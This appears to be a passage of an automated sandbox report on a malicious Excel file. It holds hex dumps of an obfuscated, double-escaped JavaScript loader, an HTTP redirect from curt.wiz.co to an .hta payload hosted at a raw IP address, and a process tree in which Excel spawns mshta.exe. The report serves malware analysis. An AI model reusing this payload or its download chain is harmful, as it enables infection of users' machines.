        Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
        Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%
        Dec 16, 2024 17:06:07.317763090 CET1236INData Raw: 33 30 25 32 35 25 33 33 25 33 32 25 32 35 25 33 33 25 33 36 25 32 35 25 33 33 25 33 37 25 32 35 25 33 33 25 33 37 25 32 35 25 33 33 25 33 39 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36
        Data Ascii: 30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%
        Dec 16, 2024 17:06:07.317804098 CET1236INData Raw: 32 35 25 33 34 25 33 39 25 32 35 25 33 36 25 36 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 32 25 33 38 25 32 35 25 33 36 25 36 32 25 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 33 33 25 32 35 25 33 36 25 33 38 25 32 35 25 33 36 25 33 31 25 32
        Data Ascii: 25%34%39%25%36%65%25%37%34%25%32%38%25%36%62%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%35%25%36%62%25%32%65%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%39%25%32%39%25%35%65%25%37%33%
        Dec 16, 2024 17:06:07.318895102 CET1236INData Raw: 36 34 25 32 35 25 33 35 25 36 34 25 32 35 25 33 34 25 33 31 25 32 35 25 33 33 25 33 33 25 32 35 25 33 34 25 36 36 25 32 35 25 33 37 25 33 36 25 32 35 25 33 37 25 33 31 25 32 35 25 33 37 25 33 38 25 32 35 25 33 36 25 36 32 25 32 35 25 33 37 25 36
        Data Ascii: 64%25%35%64%25%34%31%25%33%33%25%34%66%25%37%36%25%37%31%25%37%38%25%36%62%25%37%63%25%37%34%25%36%62%25%37%31%25%36%35%25%32%61%25%32%30%25%36%64%25%37%33%25%37%37%25%37%38%25%36%64%25%37%34%25%37%63%25%34%30%25%32%62%25%35%34%25%34%35%25%34%
        Dec 16, 2024 17:06:07.318931103 CET1236INData Raw: 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32
        Data Ascii: 25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%
        Dec 16, 2024 17:06:07.320178032 CET1236INData Raw: 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33
        Data Ascii: 31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%
        Dec 16, 2024 17:06:07.320215940 CET1236INData Raw: 36 36 25 32 35 25 33 37 25 36 36 25 32 35 25 33 37 25 33 31 25 32 35 25 33 37 25 36 35 25 32 35 25 33 35 25 36 34 25 32 35 25 33 35 25 33 39 25 32 35 25 33 37 25 33 32 25 32 35 25 33 37 25 33 35 25 32 35 25 33 37 25 33 30 25 32 35 25 33 37 25 36
        Data Ascii: 66%25%37%66%25%37%31%25%37%65%25%35%64%25%35%39%25%37%32%25%37%35%25%37%30%25%37%63%25%35%37%25%36%63%25%36%30%25%37%64%25%36%65%25%37%30%25%34%65%25%37%32%25%35%34%25%35%37%25%36%63%25%35%66%25%34%61%25%34%39%25%36%61%25%37%30%25%35%31%25%36%
        Dec 16, 2024 17:06:07.321458101 CET1236INData Raw: 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32
        Data Ascii: 25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%
        Dec 16, 2024 17:06:07.321496010 CET1236INData Raw: 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33
        Data Ascii: 31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%
        Dec 16, 2024 17:06:07.322681904 CET1236INData Raw: 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33
        Data Ascii: 30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%
        Dec 16, 2024 17:06:07.437688112 CET1236INData Raw: 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32
        Data Ascii: 25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%35%62%25%37%62%25%38%37%25%37%31%25%35%62%25%37%65%25%37%31%25%36%64%25%34%63%25%37%37%25%35%32%25%38%34%25%35%30%


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.949727170.82.174.304437620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        TimestampBytes transferredDirectionData
        2024-12-16 16:06:04 UTC224OUTGET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: curt.wiz.co
        Connection: Keep-Alive
        2024-12-16 16:06:06 UTC983INHTTP/1.1 302 Found
        Date: Mon, 16 Dec 2024 16:06:05 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 108
        Connection: close
        Set-Cookie: sess=123; path=/; Secure; HttpOnly
        Location: http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
        Strict-Transport-Security: max-age=31536000; includeSubDomains
        x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
        X-DNS-Prefetch-Control: off
        X-Frame-Options: SAMEORIGIN
        X-Download-Options: noopen
        X-Content-Type-Options: nosniff
        X-XSS-Protection: 1; mode=block
        Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
        Referrer-Policy: strict-origin
        Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
        X-GoCache-CacheStatus: BYPASS
        2024-12-16 16:06:06 UTC108INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 32 2f 32 33 33 2f 65 65 63 2f 63 72 65 61 74 65 64 62 65 74 74 65 72 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 6e 72 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 77 69 74 68 6e 69 63 65 2e 68 74 61
        Data Ascii: Found. Redirecting to http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:11:05:09
        Start date:16/12/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
        Imagebase:0xfb0000
        File size:53'161'064 bytes
        MD5 hash:4A871771235598812032C822E6F68F19
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:7
        Start time:11:06:06
        Start date:16/12/2024
        Path:C:\Windows\SysWOW64\mshta.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
        Imagebase:0xec0000
        File size:13'312 bytes
        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        Target ID:9
        Start time:11:06:13
        Start date:16/12/2024
        Path:C:\Windows\splwow64.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\splwow64.exe 12288
        Imagebase:0x7ff6f1260000
        File size:163'840 bytes
        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:12
        Start time:11:06:32
        Start date:16/12/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx"
        Imagebase:0xfb0000
        File size:53'161'064 bytes
        MD5 hash:4A871771235598812032C822E6F68F19
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Call Graph

        • Entrypoint
        • Decryption Function
        • Executed
        • Not Executed
        • Show Help
        callgraph 1 Error: Graph is empty

        Module: Sheet1

        Declaration
        LineContent
        1

        Attribute VB_Name = "Sheet1"

        2

        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = True

        9

        Attribute VB_Name = "Sheet1"

        10

        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

        11

        Attribute VB_GlobalNameSpace = False

        12

        Attribute VB_Creatable = False

        13

        Attribute VB_PredeclaredId = True

        14

        Attribute VB_Exposed = True

        15

        Attribute VB_TemplateDerived = False

        16

        Attribute VB_Customizable = True

        Module: Sheet2

        Declaration
        LineContent
        1

        Attribute VB_Name = "Sheet2"

        2

        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = True

        9

        Attribute VB_Name = "Sheet2"

        10

        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

        11

        Attribute VB_GlobalNameSpace = False

        12

        Attribute VB_Creatable = False

        13

        Attribute VB_PredeclaredId = True

        14

        Attribute VB_Exposed = True

        15

        Attribute VB_TemplateDerived = False

        16

        Attribute VB_Customizable = True

        Module: ThisWorkbook

        Declaration
        LineContent
        1

        Attribute VB_Name = "ThisWorkbook"

        2

        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

        3

        Attribute VB_GlobalNameSpace = False

        4

        Attribute VB_Creatable = False

        5

        Attribute VB_PredeclaredId = True

        6

        Attribute VB_Exposed = True

        7

        Attribute VB_TemplateDerived = False

        8

        Attribute VB_Customizable = True

        9

        Attribute VB_Name = "ThisWorkbook"

        10

        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

        11

        Attribute VB_GlobalNameSpace = False

        12

        Attribute VB_Creatable = False

        13

        Attribute VB_PredeclaredId = True

        14

        Attribute VB_Exposed = True

        15

        Attribute VB_TemplateDerived = False

        16

        Attribute VB_Customizable = True

        Reset < >